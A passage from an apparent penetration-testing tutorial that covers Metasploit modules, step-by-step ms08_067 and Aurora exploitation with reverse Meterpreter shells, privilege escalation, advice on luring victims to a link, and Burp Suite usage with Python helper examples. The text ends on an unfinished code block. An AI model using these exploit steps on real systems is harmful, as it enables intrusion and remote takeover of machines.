In addition to providing valuable reconnaissance tools such as portscanners and service fingerprinters, auxiliary modules such as ssh_login can take a known list of usernames and passwords and then attempt to log in via brute force across an entire target network. Also included in the auxiliary modules are various protocol fuzzers such as ftp_pre_post,http_get_uri_long,smtp_fuzzer,ssh_version_corrupt, and more. You can launch these fuzzers at a target service in hopes of finding your own vulnerabilities to exploit. Just because auxiliary modules don’t have a payload, don’t think you won’t use them. But before we dive into their myriad uses, here’s an overview to help you see what we are dealing with.

There are many auxiliary modules; we will only cover a few basics here, and you are free to experiment in msfconsole yourself, because its built-in help is comprehensive. Auxiliary modules are exciting because they can be used in so many ways for so many things. If you can't find the perfect auxiliary module, it's easy to modify one to suit your specific needs.

Consider a common example. Say you are conducting a remote penetration test, and upon scanning the network you identify a number of web servers and not much else. Your attack surface is limited at this point, and you have to work with what is available to you. The auxiliary scanner/http modules will now prove extremely helpful as you look for low-hanging fruit against which you can launch an exploit. To list all available HTTP scanners, run search scanner/http. You will see immediately that there are modules you can use for further exploration. Older versions of Microsoft IIS had a vulnerability in their WebDAV implementation that allowed remote exploitation, so you could first run the WebDAV scanner from that list against your targets in the hope of finding a server with WebDAV enabled.

In the scan output (a screenshot in the original), the host marked 2 reports WebDAV enabled, so it is the one to go after. That should give you some idea of what auxiliary modules are for.

______
Now that you have some idea of how to use exploits and auxiliary modules, let's do a case study of attacking a system.

The materials have been copied from metasploit unleased and metasploit a penetration testers guide.

This case study deals with hacking a computer with just its IP address.

First run netdiscover to find the hosts on your network and pick the target. You can run the command on its own, or narrow it down to an interface and address range like this: netdiscover -i eth0 -r 192.168.0.1/24

Your output will look something like the screenshot in the original. Now open a Metasploit console by typing msfconsole in a terminal.

Now search for all exploits that have to do with netapi: search netapi

Select the exploit highlighted in the original screenshot: use exploit/windows/smb/ms08_067_netapi

Now type show options to list all of the options you can set for this exploit: show options

Now set the remote host, the machine we are attacking (the victim's PC): set RHOST 192.168.0.101

Now we want to set the payload for the exploit by typing in the command below

set PAYLOAD windows/meterpreter/reverse_tcp

Now set the local host, which is your own attacking machine: set LHOST 192.168.0.100
Last but not least, type the command below to launch the exploit: exploit

Now you can use Meterpreter; refer to the command reference above.

This attack works against an unpatched Windows XP SP2 system only when TCP port 445 (SMB) is reachable, which on SP2 means the Windows Firewall has been disabled or file and printer sharing has been allowed through it; the firewall is on by default from SP2 onwards.

Thanks to the guy called n1tr0g3n.

The Microsoft internet Explorer Exploit

In 2010 major companies such as Google, Adobe, Symantec, Juniper Networks and others were attacked with an exploit known as Aurora. The Metasploit framework has an exploit that uses the same technique as the famous Aurora attack and takes advantage of a memory corruption flaw in Internet Explorer.

For this example we will test the exploit against a machine running Windows XP in order to see how it affects Internet Explorer 6. So we open the Metasploit framework and search for ms10_002, the Aurora exploit.
Searching for the Aurora exploit and selecting the payload

For this attack, as the screenshot in the original shows, we have chosen windows/meterpreter/reverse_tcp as the payload. Next it is time to have a look at the available options of the exploit.

Analyzing the Options of Aurora Exploit

As we can see, the default setting for SRVHOST is 0.0.0.0; if we leave it like that the web server binds to all interfaces. The next option is SRVPORT, the port to which the victim must connect in order to trigger the exploit. By default the port is 8080, but we will use port 80 for this example. We also have the option to serve the page over SSL, but here we will not configure it. The next setting is URIPATH, which is not set by default; left unset, Metasploit generates a random path. URIPATH is the path on our server that the victim must request to trigger the vulnerability. We can use a custom path or set it to slash (/).

For the payload settings we only need to configure the listen port and the listen address. For this scenario we have chosen port 443 and the IP address 192.168.1.1, which is our local address. The settings made so far were shown in the original as a screenshot captioned:

Setting the Aurora and the payload

Now that all the settings are correct, it is time to run the exploit with the exploit command. We will notice that it starts the web server on our local IP address. All we need now is to send the URL (or the URI path, if you prefer) to our victims and wait for someone to connect. For this scenario we have set the URI path to /, so the link is just our IP address.

From the moment someone opens the link, the exploit starts its heap spray. Internet Explorer on the target stops responding for a while and its memory use rises sharply, making the whole system sluggish.

The next image in the original showed the Aurora exploit opening a Meterpreter session.
Running the Aurora Exploit

Now we have a Meterpreter shell on the remote machine and we can start interacting with it using the command sessions -i 1. However, if the user closes the browser we lose the shell, because the Meterpreter server is running inside the browser process. To avoid that, type run migrate in the Meterpreter session; it automatically migrates into another process on the system so that we keep our shell.

Starting the session and migration with another process

Additionally we can try to escalate privileges with the command getsystem and we can see the running processes of the remote system with the command ps.

Privilege Escalation
The getsystem command can be used to obtain SYSTEM privileges.

Affected versions

Internet Explorer 6

Microsoft states that Internet Explorer 7 and 8 are affected as well, but nobody so far has seen this exploit work against those versions.

Conclusion

This was a client-side attack using the famous Aurora exploit. Microsoft states that Internet Explorer 7 and 8 are affected too, but in our tests against these versions we couldn't get a shell.

The problem with this exploit is that it requires user interaction in order to get a shell. The user must open an unknown link coming from an unknown sender, so you need to work out a method that will convince your targets. Also, if the user closes the web browser, the shell is lost. This means we have to migrate out of the browser process into another process very quickly.

I will go deeper into Metasploit and its internals in the advanced sections. See Offensive Security's Metasploit tutorials for more; the idea here was to present the basic layout.

______

Chapter 3:Web Security:The Burp Suite and W3AF

What is Burp Suite?

Burp Suite is an integrated platform for attacking web applications. It contains a variety of tools with numerous interfaces between them designed to facilitate and speed up the process of attacking an application. All of the tools share the same robust framework for handling and displaying HTTP messages, persistence, authentication, proxies, logging, alerting and extensibility.

Burp Suite allows the individual tools to work together in highly effective ways, for instance:
 A central site map is used to aggregate information gathered about target applications, and a centrally-defined target scope can be used to control the behaviour of individual tools.
 Any HTTP request and response processed by any of the Burp tools can be selected for treatment by other tools. For example, a request from the Proxy history can be sent to Intruder to form the basis of a custom automated attack, to Repeater for a manual attack, to the Scanner for vulnerability analysis, or to Spider for automated content discovery.
 Applications can be "passively" spidered without generating huge numbers of automated requests. All requests and responses passing through Burp Proxy are parsed for links and forms, and the site map is updated accordingly, allowing you to map sensitive applications in a non-intrusive manner, with full control over every request that is made.
 Requests passing through the Proxy can be automatically scanned for security vulnerabilities while you are browsing (based on the defined target scope).
 The IBurpExtender interface can be used to extend the functionality of Burp Suite and individual tools. Data processed by one tool can be used in arbitrary ways to affect the behaviour and results of other tools.

Burp Suite tools

Burp Suite contains the following tools:

 Proxy - an intercepting HTTP/S proxy server which operates as a man-in-the-middle between the end browser and the target web application, allowing you to intercept, inspect and modify the raw traffic passing in both directions.
 Spider - an intelligent application-aware web spider which allows complete enumeration of an application's content and functionality.
 Scanner [Pro version only] - an advanced tool for performing automated discovery of security vulnerabilities in web applications.
 Intruder - a highly configurable tool for automating customised attacks against web applications, such as enumerating identifiers, harvesting useful data, and fuzzing for common vulnerabilities.
 Repeater - a tool for manually manipulating and re-issuing individual HTTP requests, and analysing the application's responses.
 Sequencer - a tool for analysing the quality of randomness in an application's session tokens or other important data items which are intended to be unpredictable.
 Decoder - a tool for performing manual or intelligent decoding and encoding of application data.
 Comparer - a utility for performing a visual "diff" between any two items of data, normally pairs of related requests and responses.

The detailed help for each individual tool is in Burp's own documentation. The remainder of this section describes some typical usage scenarios for Burp Suite and the shared functionality and configuration options that affect the behaviour of all of the Burp tools.

Using Burp Suite

When Burp Suite is launched, Burp Proxy is started by default on port 8080 of the local loopback interface. By setting a web browser to use this as its proxy server, all web traffic can be intercepted, inspected and modified; to intercept HTTPS without certificate warnings, install Burp's CA certificate in the browser. By default, requests for non-media resources are intercepted and displayed (this default behaviour can be modified using options within Burp Proxy). All web traffic passing through Burp Proxy is by default analysed and incorporated into the target site map, to build up a picture of the content and functionality of the applications visited. In Burp Suite Professional, all requests are by default passively analysed by Burp Scanner to identify a range of security vulnerabilities.

Before you begin work in earnest, you should ideally define the target scope for your work. The easiest way to do this is to browse to the application(s) you are targeting, then locate the relevant hosts or directories within the site map, and use the context menus to add URL paths to the scope. This central scope configuration can be used to control the behaviour of the individual Burp tools in various ways.

As you browse the target application, you can intercept requests and responses in the Proxy for manual editing, or you can turn interception off altogether. With interception off, a full history is still maintained of each request and response, and content still accumulates within the site map. As well as modifying intercepted messages within the Proxy, you can send these to other Burp tools to perform various actions, for example:

 You can send requests to Repeater, to manually fine-tune an attack against the application, and reissue an individual request multiple times.
 [Pro version] You can send requests to Scanner, to perform active or passive vulnerability scanning.
 You can send requests to Intruder, to launch a custom automated attack to identify common vulnerabilities.
 If you see a response containing a session token or other identifier that is intended to be unpredictable, you can pass this to Sequencer to test the randomness of the token.
 Opaque data contained within any request or response can be sent to Decoder to perform a smart decode and identify any hidden information.
 [Pro version] You can use various engagement tools to make your work faster and more effective.

You can also perform any of the above actions on items in the proxy history, on individual hosts, directories or files within the target site map, or from anywhere within any of the tools where requests and responses are displayed.
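The kind of check that Sequencer automates, as an added example that is not Burp's code and uses none of its statistical tests: a per-character-position entropy estimate over a sample of tokens, which is enough to catch the common failure where most of a token is constant or a counter. Both token generators are constructed for the demonstration (a counter behind a fixed prefix, and a seeded PRNG standing in for a proper random source), and the 'weak' threshold is an assumption.

```python
import math
import random
from collections import Counter


def shannon_bits(symbols):
    """Plug-in Shannon entropy estimate, in bits, of a list of symbols."""
    counts = Counter(symbols)
    n = len(symbols)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def analyze_tokens(tokens):
    """Per-character-position entropy over a sample of equal-length tokens."""
    length = len(tokens[0])
    if any(len(t) != length for t in tokens):
        raise ValueError("tokens must all have the same length")
    per_pos = [shannon_bits([t[i] for t in tokens]) for i in range(length)]
    return {
        "length": length,
        "samples": len(tokens),
        "per_position_bits": per_pos,
        "constant_positions": sum(1 for b in per_pos if b == 0.0),
        "estimated_bits": sum(per_pos),   # upper bound: ignores cross-position structure
    }


def verdict(report, per_char_max):
    """Flag a token whose observed entropy is far below what its alphabet allows.
    per_char_max is log2(alphabet size); the 50% threshold is an assumption."""
    ceiling = report["length"] * per_char_max
    return "weak" if report["estimated_bits"] < ceiling / 2 else "plausible"


def weak_tokens(n):
    """Constructed weak generator: fixed prefix plus a zero-padded counter."""
    return ["sess%012d" % i for i in range(1, n + 1)]


def strong_tokens(n, seed=1234):
    """Constructed stand-in for a CSPRNG token: 16 hex chars from a seeded PRNG
    (seeded only so the demo is repeatable; a real application must use secrets)."""
    rng = random.Random(seed)
    return ["%016x" % rng.getrandbits(64) for _ in range(n)]


if __name__ == "__main__":
    for name, toks, per_char in (("counter", weak_tokens(200), math.log2(36)),
                                 ("prng", strong_tokens(200), 4.0)):
        r = analyze_tokens(toks)
        print("%-8s est %.1f bits, %d constant positions -> %s"
              % (name, r["estimated_bits"], r["constant_positions"], verdict(r, per_char)))
```

With 200 samples the counter-based tokens come out at well under 10 bits with thirteen constant positions, while the PRNG tokens land near the 64-bit ceiling. The per-position estimate is deliberately optimistic: it cannot see that a token is time-based or sequential across positions, which is why Sequencer also runs bit-level and correlation tests.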

A central logging function can be used to record all requests and responses made by individual tools, or the entire suite. The tools can run in a single tabbed window, or be detached in individual windows. All tool and suite configuration is optionally persistent across program loads. In Burp Suite Professional, you can save the entire state of the component tools, to reload at a later stage and resume your work.

Burp menu

This menu contains a number of key functions and configuration options, which are described below.

Search

[Pro version] Selecting "search" from the Burp menu opens a search dialog, which is very easy to use. You can specify the following search parameters:

 the expression to search for
 whether the search is case sensitive
 whether the search is simple text or a regular expression
 whether the search is restricted to in-scope items only
 whether the search results should dynamically update as new HTTP messages are processed
 which locations to search within HTTP messages (requests vs. responses, headers vs. body)
 which tools to search in

When you click "go", the search begins, and the key details of each search match are shown in a sortable table, with a preview pane where you can see the full request and response, including highlighted matches for your search item. The usual context menus can be used to initiate attacks against specific items, or send them to other tools for further analysis. Note that if you initiate a search via the context menu within the target site map (as opposed to the Burp menu), then the search will be specific to the selected branch(es) of the site map.

Saving and restoring state

[Pro version] The help below describes the process of saving and restoring state, and some common usage scenarios for this functionality.

Saving state

The items that can be saved include:

 The target site map, which includes all of the content discovered via the Proxy and Spider.
 The Proxy history.
 The issues identified by the Scanner.
 The contents and histories of the Repeater tabs.
 The configuration of all suite tools.

Selecting "save state" from the Burp menu launches a wizard where you can define which items you want to save the state and configuration of. You then choose your output file, and Burp does the rest. You can continue using Burp while its state is being saved; you may experience some brief delays if you try to perform an operation on data which Burp is in the process of saving, to prevent any data corruption. Obviously, because the save file includes the requests and responses accumulated within the tools you are saving, this file can grow very large. In practice, a few hours' testing will typically save or restore in a minute or two. You can make this process leaner and quicker by deleting unneeded items from the site map and proxy history before performing a save.

Restoring state

Selecting "restore state" from the Burp menu launches a wizard where you can define which items you want to restore the state and configuration of. The first step is to select a file which you previously saved. Burp then analyses this file to identify all of its contents (remember that each save file can include the state and configuration for any combinations of tools). For each type of saved state and configuration, Burp lets you choose whether you want to restore it, and if so whether to add to or replace the tool's existing state:

Burp then goes to work and restores everything you have selected. You can continue using Burp while its state is being restored - you may experience some brief delays if you try to perform an operation on data which Burp is in the process of restoring, to prevent any data corruption.

Usage scenarios

The ability to save and restore tool state and configuration is of huge benefit to penetration testers:

- You can save your work at the end of each day and seamlessly resume it the next morning.
- You can back up key test information throughout a job, in case of system crashes.
- At the end of an engagement, you can store a full archive of all accumulated information, enabling you to re-open your work at a later point, to answer a client question or re-test a fixed issue.
- The task of mapping out an application's content can be divided up between consultants, and the resulting site maps can be merged incrementally into one, for all consultants to share.
- Team leaders can optimise Burp's configuration for a particular engagement, including fine-grained target scope definition, and pass this configuration straight to other team members to begin testing.
- You can create configuration templates designed for different kinds of task, save these for future use, and switch between them easily.

Remembering settings

The "remember settings" options determine whether Burp Suite will remember configuration settings across different loads of the software. You can tell Burp to remember settings for all tools, or for individually selected tools.

The "restore defaults" options reset all configuration settings within Burp Suite or individual tools to their default values.

Lean mode

If this option is selected, then the next time Burp Suite starts, it will run in a "lean" mode in which the only tools available are Burp Proxy, Intruder and Repeater. Running in this mode creates a smaller impact on system resources and is designed for users who prefer a more simple lightweight tool.

Target site map

The central site map aggregates all of the information which Burp has gathered about the application you are attacking. This includes all of the resources which have been directly requested via the Proxy, any items which have been inferred by analysing the responses to those requests, and all content discovered using the Spider. When you begin browsing a typical application, a large amount of content will be mapped out for you before you even get as far as requesting it, for example: Items that have been requested are shown in black; those which Burp has inferred but not yet requested are shown in grey. By default, items that are typically uninteresting to penetration testers are filtered from the display, but this behaviour can be modified (described below).

The site map interface works essentially like a graphical email client. A tree view of hosts and directories is shown on the left. Selecting one or more nodes in the tree view causes all of the items below these nodes to be shown in table form on the top right. This table includes the key detail about each item (URL, status code, page title, etc.) and allows the items to be sorted according to any column (click any column heading to sort descending, or shift-click to sort ascending). Selecting an item in the table causes the request and response for that item to show in a preview pane on the bottom right. This preview pane contains all of the functions familiar from elsewhere in Burp - analysis of headers and parameters, text search, media rendering, etc.

As well as displaying all of the information gathered about your target, the site map enables you to control and initiate specific attacks against it, using the context menus that appear everywhere. For example, you can select a host or folder within the tree view, and perform actions on the entire branch of the tree, such as spidering or scanning:

Similarly, you can select an individual file within the tree or table, and send the associated request to other tools, such as Intruder or Repeater. If the item has not yet been requested by your browser, Burp will construct a default request for the item, based on the URL and any cookies received from the target domain: [Pro version] You can use the context menu to access various engagement tools, such as searching for comments and scripts, analysing your target web site, scheduling tasks, etc.

In the table view, you can annotate individual or multiple items, by adding comments and highlights: You can highlight individual items using a drop-down menu on the left-most table column:

And you can comment individual items in-place by double-clicking and editing the table cell: Alternatively, if you want to annotate several items at once, you select the relevant items and use the context menu to add comments or apply highlights:

When you have annotated interesting requests, you can use column sorting and display filters to quickly find these items later. The content displayed within the site map is effectively a view into an underlying database, and you can configure filters to determine which items of underlying data are displayed within the map. Some applications contain a large amount of content like images, CSS, etc., which it is normally helpful to hide from view. At the top of the site map, there is a filter bar. Clicking on this shows a popup enabling you to configure exactly what content will be displayed within the map:

You can choose to display only requests with parameters, or which are within the current target scope. You can filter by MIME type, HTTP status code and file extension. If you set a filter to hide some items, these are not deleted, only hidden, and will reappear if you unset the relevant filter. This means you can use the filter to help you systematically examine a complex site map to understand where different kinds of interesting content reside.

[Pro version] You can also specify a search term to filter on, which will only show items containing that expression in the request or response, or within the user-added comment if applicable.

In addition to filtering content from view, you may sometimes want to delete it altogether. For example, if you have browsed to off-target domains, you will have accumulated data within Burp that you just don't need. In this situation, you can permanently delete the superfluous items using the context menus within the site map. For example, you can select multiple hosts or folders within the tree or table views and delete them altogether:

Comparing site maps

You can use Burp to compare two site maps and highlight differences. This feature can be used in various ways to help find different types of access control vulnerabilities, and identify which areas of a large application warrant close manual inspection. Some typical use-cases for this functionality are as follows:

- You can map the application using accounts with different privilege levels, and compare the results to identify functionality that is visible to one user but not the other.
- You can map the application using a high-privileged account, and then re-request the entire site map using a low-privileged account, to identify whether access to privileged functions is properly controlled.
- You can map the application using two different accounts of the same type, to identify cases where user-specific identifiers are used to access sensitive resources, and determine whether per-user data is properly segregated.

You can access the "compare site maps" feature using the context menu on the main site map. This opens a wizard that lets you configure the details of the site maps you want to compare, and how the comparison should be done. When selecting the site maps you want to compare, the following options are available:

- The current site map that appears in Burp's target tab.
- A site map loaded from a Burp state file that you saved earlier.
- Either of the above, re-requested in a different session context.

You can choose to include all of the site map's contents, or you can restrict only to selected or in-scope items. If you choose to re-request a site map in a different session context, it is particularly important not to include requests that might disrupt that context - for example, login, logout, user impersonation functions, etc.

To perform the comparison, Burp works through each request in the first site map, and matches this with a request in the second site map, and vice versa. The responses to matched requests are then compared to identify any differences. Any unmatched items in either site map are flagged as deleted or added, respectively. The exact process by which this is done is highly configurable, allowing you to tailor the comparison to features of the target application.

The options for configuring how Burp matches requests in the two site maps are shown below: The default options shown will work well in most situations, and match requests based on URL file path, HTTP method and the names of parameters in the query string and message body. For some applications, you will need to modify these options to ensure that requests are correctly matched. For example, if an application uses the same base URL for various different actions, and specifies the action using the values of query string parameters, you will need to match requests on the values of these parameters as well as their names. The options for configuring how Burp compares the responses to matched requests are shown below:

Again, the default options will work in most situations. These options ignore various common HTTP headers and form fields that have ephemeral values, and also ignore whitespace-only variations in responses. The default options are designed to reduce the noise generated by inconsequential variations in responses, allowing you to focus attention on differences that are more likely to matter.

The results of a simple site map comparison are shown below. This shows an application that has been mapped out with administrative privileges, and the resulting site map re-requested with user-level privileges. The results contain a colourised analysis of the differences between the site maps, and show items that have been added, deleted or modified between the two maps. (In this case, since the whole of the first site map was re-requested, there are no added or deleted items in the maps themselves.) For modified items, the table includes a “diff count” column, which is the number of edits required to modify the item in the first map into the item in the second map. When you select an item, the corresponding item in the other site map is also selected, and each response is highlighted to show the locations of the differences:
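To make the matching and comparison steps concrete, here is an added Python model of the procedure just described (example code, not Burp's implementation or anything from this book). Requests are matched on method, URL path and parameter names (optionally values too), responses are compared after dropping ephemeral headers and ignoring whitespace-only differences, and matched items receive a diff count; unmatched items are reported as added or deleted. The two site maps, the header list and all function names are constructed assumptions.

```python
import difflib
import re
from urllib.parse import parse_qsl, urlsplit

# Headers whose values change between sessions without the page itself changing.
EPHEMERAL_HEADERS = {"date", "expires", "etag", "last-modified", "set-cookie", "content-length"}


def request_key(method, url, body="", match_param_values=False):
    """Matching signature: method, URL path and the parameter names from the query
    string and URL-encoded body. With match_param_values=True the values count too,
    which is what an application that selects its action via ?action=... needs."""
    parts = urlsplit(url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    params += parse_qsl(body, keep_blank_values=True)
    if match_param_values:
        signature = tuple(sorted(params))
    else:
        signature = tuple(sorted(name for name, _ in params))
    return (method.upper(), parts.path, signature)


def response_tokens(raw):
    """Reduce a response to comparable tokens: status line, non-ephemeral headers,
    then body tokens (markup tags and whitespace-delimited words), so that
    whitespace-only variations such as reindented HTML never register as a change."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    tokens = [lines[0].strip()]
    for line in lines[1:]:
        name = line.split(":", 1)[0].strip().lower()
        if name not in EPHEMERAL_HEADERS:
            tokens.append(line.strip())
    tokens.extend(re.findall(r"<[^>]*>|[^<\s]+", body))
    return tokens


def diff_count(tokens_a, tokens_b):
    """Number of edit operations needed to turn one token list into the other."""
    matcher = difflib.SequenceMatcher(None, tokens_a, tokens_b, autojunk=False)
    return sum(1 for op in matcher.get_opcodes() if op[0] != "equal")


def compare_site_maps(first, second, match_param_values=False):
    """first/second: lists of (method, url, body, raw_response).
    Returns added/deleted keys and, for matched keys, unchanged or the diff count."""
    index1 = {request_key(m, u, b, match_param_values): r for m, u, b, r in first}
    index2 = {request_key(m, u, b, match_param_values): r for m, u, b, r in second}
    result = {"added": [], "deleted": [], "modified": {}, "unchanged": []}
    for key, resp1 in index1.items():
        if key not in index2:
            result["deleted"].append(key)
            continue
        t1, t2 = response_tokens(resp1), response_tokens(index2[key])
        if t1 == t2:
            result["unchanged"].append(key)
        else:
            result["modified"][key] = diff_count(t1, t2)
    result["added"] = [key for key in index2 if key not in index1]
    return result


def identical_under(result, path_prefix):
    """Matched requests beneath a privileged path whose responses were identical in
    both sessions: the items a reviewer must examine by hand, because identical
    output from an admin function to a low-privileged user is the classic failure."""
    return [key for key in result["unchanged"] if key[1].startswith(path_prefix)]


# Constructed site maps (assumed values): mapped as admin, then re-requested as "bob".
ADMIN_MAP = [
    ("GET", "https://app.example.test/home", "",
     "HTTP/1.1 200 OK\r\nDate: Mon, 02 Jan 2012 09:00:00 GMT\r\nContent-Type: text/html\r\n\r\n"
     "<p>Logged in as admin</p><a href=/admin>Admin</a>"),
    ("GET", "https://app.example.test/admin", "",
     "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
     "<ul><li>List users</li><li>Settings</li></ul>"),
    ("GET", "https://app.example.test/admin/users?page=1", "",
     "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
     "<table><tr><td>alice</td></tr></table>"),
]
USER_MAP = [
    ("GET", "https://app.example.test/home", "",
     "HTTP/1.1 200 OK\r\nDate: Tue, 03 Jan 2012 14:30:00 GMT\r\nContent-Type: text/html\r\n\r\n"
     "<p>Logged in as bob</p>"),
    ("GET", "https://app.example.test/admin", "",
     "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<p>Not authorised</p>"),
    ("GET", "https://app.example.test/admin/users?page=2", "",
     "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
     "<table>\n  <tr><td>alice</td></tr>\n</table>"),
]
```

With the default matching, `/admin/users?page=1` and `?page=2` are the same item (same parameter name), the differing Date headers and the reindented table are ignored, and that item comes out unchanged while `/home` and `/admin` are modified. Switching on `match_param_values` turns the two `/admin/users` requests into one deleted and one added item instead, which is the behaviour you want only when parameter values select the function.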

Interpreting the results of the site map comparison requires human intelligence, and an understanding of the meaning and context of specific application functions. For example, the screenshot above shows the responses that are returned to each user when they view their home page. The two responses show a different description of the logged-in user, and the administrative user has an additional menu item. These differences are to be expected, and they are neutral as to the effectiveness of the application’s access controls, since they only concern the user interface.

The screenshot below shows the response returned when each user requests the top-level admin page. Here, the administrative user sees a menu of available options, while the ordinary user sees a “not authorised” message. These differences indicate that access controls are being correctly applied:

The screenshot below shows the response returned when each user requests the “list users” admin function. Here, the responses are identical, indicating that the application is vulnerable, since the ordinary user should not have access to this function and does not have any link to it in their user interface: As this example shows, simply exploring the site map tree and looking at the number of differences between items is not sufficient to evaluate the effectiveness of an application’s access controls. Two identical responses may indicate a vulnerability (for example, in an administrative function that discloses sensitive information), or may be harmless (for example, in an unprotected search function). Conversely, two different responses may still mean that a vulnerability exists (for example, in an administrative function that returns different content each time it is accessed), or may be harmless (for example, in a page showing profile information about the currently logged-in user). All of these scenarios may coexist even in the same application. This is why fully automated tools are so ineffective at identifying access control vulnerabilities.

So Burp does not relieve you of the task of closely examining the application's functionality, and evaluating whether access controls are being properly applied in each case. What the site map comparison feature does is to automate as much of the process as possible, giving you all the information you need in a clear form, and letting you apply your knowledge of the application’s functionality to identify any actual vulnerabilities.

Target scope

The "scope" tab lets you tell Burp, at a Suite-wide level, exactly what hosts and URLs constitute the target for your current work. You can think of the target scope as, roughly, the items which you are currently interested in and willing to attack.

The target scope can affect the behaviour of the individual Burp tools in numerous ways, for example:

- You can set display filters to show only in-scope items.
- You can tell the Proxy to intercept only in-scope requests and responses.
- The Spider will only follow links that are in scope.
- In Burp Suite Professional, you can automatically initiate vulnerability scans of in-scope items.
- You can configure Intruder and Repeater to follow redirects to any in-scope URLs.

By telling Burp what your current target is, you can ensure that Burp carries out numerous such actions in an appropriate way, only going after items that you are interested in and willing to attack. In all cases, you can additionally fine tune the target scope and the associated behaviour at the level of individual tools, giving you fine-grained control over everything that Burp does, if you need it. However, the Suite-wide scope definition provides a quick and easy way to tell Burp what is fair game and what is off limits, and is almost always worth configuring before you begin your work in earnest.

The configuration of target scope is very powerful, but also very easy. The UI in the "scope" tab lets you define rules for what is included within, or excluded from, the target scope. For each rule, you can define the following fields:

- Protocol - HTTP, HTTPS, or either.
- Host - this can be either a regular expression to match the hostname, or an IP range in various standard formats, for example 10.1.1.1/24 or 10.1.1-20.1-127. If the host field is left blank, then the rule can match requests to any host.
- Port - this is a regular expression to match the port number. If the port field is left blank, then the rule can match requests to any port.
- File - this is a regular expression to match the file portion of the URL. If the file field is left blank, then the rule can match requests for any file.

When Burp evaluates a URL to decide if it is within the target scope, it will be deemed to be in scope if the URL matches at least one "include" rule and does not match any "exclude" rules. This enables you to define specific hosts and directories as being generally within scope, and yet exclude from that scope specific subdirectories or files. For example, the target scope defined below will match any content within https://www.myapp.com and https://staging.myapp.com with the exception of content below https://www.myapp.com/admin and any URL containing the expression "logout":
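The rule evaluation just described, as an added Python example (not Burp's own code and not from this book): each rule has the four fields listed above, a URL is in scope when it matches at least one include rule and no exclude rule, and the host field accepts a regex, a CIDR range such as 10.1.1.1/24, or a dashed-octet range such as 10.1.1-20.1-127. The regexes used to express the www.myapp.com / staging.myapp.com scope are my assumptions, as is the choice to apply the file regex to the path plus query string.

```python
import ipaddress
import re
from dataclasses import dataclass
from urllib.parse import urlsplit


@dataclass
class ScopeRule:
    """One include or exclude rule. Blank host/port/file fields match anything."""
    protocol: str = "any"   # "http", "https" or "any"
    host: str = ""          # regex on the hostname, or an IPv4 range (CIDR or dashed octets)
    port: str = ""          # regex on the port number
    file: str = ""          # regex on the file portion of the URL (assumed: path plus query)


def _octet_in_range(spec, value):
    """'1-20' covers 1..20 inclusive; '10' covers only 10."""
    if "-" in spec:
        low, high = (int(x) for x in spec.split("-", 1))
        return low <= value <= high
    return int(spec) == value


def host_matches(rule_host, host):
    if not rule_host:
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None
    if ip is not None and ip.version == 4:
        if "/" in rule_host:                                   # CIDR form, e.g. 10.1.1.1/24
            try:
                return ip in ipaddress.ip_network(rule_host, strict=False)
            except ValueError:
                pass                                           # not a range: treat as regex
        if "-" in rule_host and re.fullmatch(r"[\d.-]+", rule_host):   # e.g. 10.1.1-20.1-127
            specs, octets = rule_host.split("."), host.split(".")
            return len(specs) == 4 and all(
                _octet_in_range(s, int(o)) for s, o in zip(specs, octets))
    return re.search(rule_host, host, re.IGNORECASE) is not None


def _effective_port(parts):
    if parts.port is not None:
        return parts.port
    return 443 if parts.scheme == "https" else 80


def rule_matches(rule, url):
    parts = urlsplit(url)
    if rule.protocol != "any" and parts.scheme != rule.protocol:
        return False
    if not host_matches(rule.host, parts.hostname or ""):
        return False
    if rule.port and not re.search(rule.port, str(_effective_port(parts))):
        return False
    file_part = parts.path + ("?" + parts.query if parts.query else "")
    if rule.file and not re.search(rule.file, file_part):
        return False
    return True


def in_scope(url, includes, excludes):
    """In scope = matches at least one include rule and does not match any exclude rule."""
    return (any(rule_matches(r, url) for r in includes)
            and not any(rule_matches(r, url) for r in excludes))


# The scope described in the text, expressed as rules (the regexes are assumptions).
INCLUDES = [
    ScopeRule(protocol="https", host=r"^www\.myapp\.com$"),
    ScopeRule(protocol="https", host=r"^staging\.myapp\.com$"),
]
EXCLUDES = [
    ScopeRule(protocol="https", host=r"^www\.myapp\.com$", file=r"^/admin"),
    ScopeRule(file=r"logout"),
]
```

Note the anchored host regexes: an unanchored `myapp\.com` would also put `myapp.com.attacker.test` in scope, which is exactly the kind of accident the include/exclude design is meant to prevent.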

Configuring scope rules directly as described above is somewhat unfriendly for many users. A much easier approach is to let Burp define the rules for you based on intuitive instructions which you give it using the context menus in the site map or elsewhere. Before you begin testing the application, you simply need to browse to the relevant content so that it appears in the site map. You can then select one or more hosts and folders, and use the context menu to include or exclude these from the scope. This process is extremely easy and in most situations will let you quickly define all of the rules necessary for your testing:

Suite options

The options tab contains Suite-wide settings which are not specific to any individual tools. These are divided into several sub-tabs containing different areas of settings.

Connections tab

This tab contains options controlling how Burp handles network connections, including authentication, proxy servers, redirections, timeouts and hostname resolution.

These settings control whether Burp Suite should perform authentication to destination web servers. Different authentication types and credentials can be configured for individual hosts. Supported types are: basic, NTLMv1, NTLMv2 and digest authentication. The domain and hostname fields are only used for NTLM authentication. The "prompt for credentials" option causes an interactive popup to appear whenever an authentication failure is encountered.

These settings allow you to configure rules specifying different proxy settings for different (ranges of) destination hosts.

The configuration shown above will make Burp talk directly to staging.intranet.corp.com, use an internal proxy server without authentication for everything else on *.intranet.corp.com, and use an authenticated gateway web proxy for everything else, including the public internet.

You can use standard wildcards in the destination host specification. Rules are applied in sequence, and the first rule which matches the web server you are communicating with will be used. If no rule is matched, Burp defaults to direct, non-proxy connections. For each upstream proxy you configure, you can specify an authentication type and credentials if required. Supported types are: basic, NTLMv1, NTLMv2 and digest authentication. The domain and hostname fields are only used for NTLM authentication.

These options let you configure Burp to use a SOCKS proxy for all outgoing communications.
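The first-match rule ordering matters more than it looks, so here is an added Python model of the upstream proxy rule table described above (example code, not Burp's implementation and not from this book). It reproduces the three-rule configuration from the text with assumed proxy names and ports, resolves a destination host to a route, and flags rules that can never fire because an earlier, broader rule shadows them. Wildcards are interpreted with shell-style `fnmatch` semantics, which is an assumption about what "standard wildcards" means.

```python
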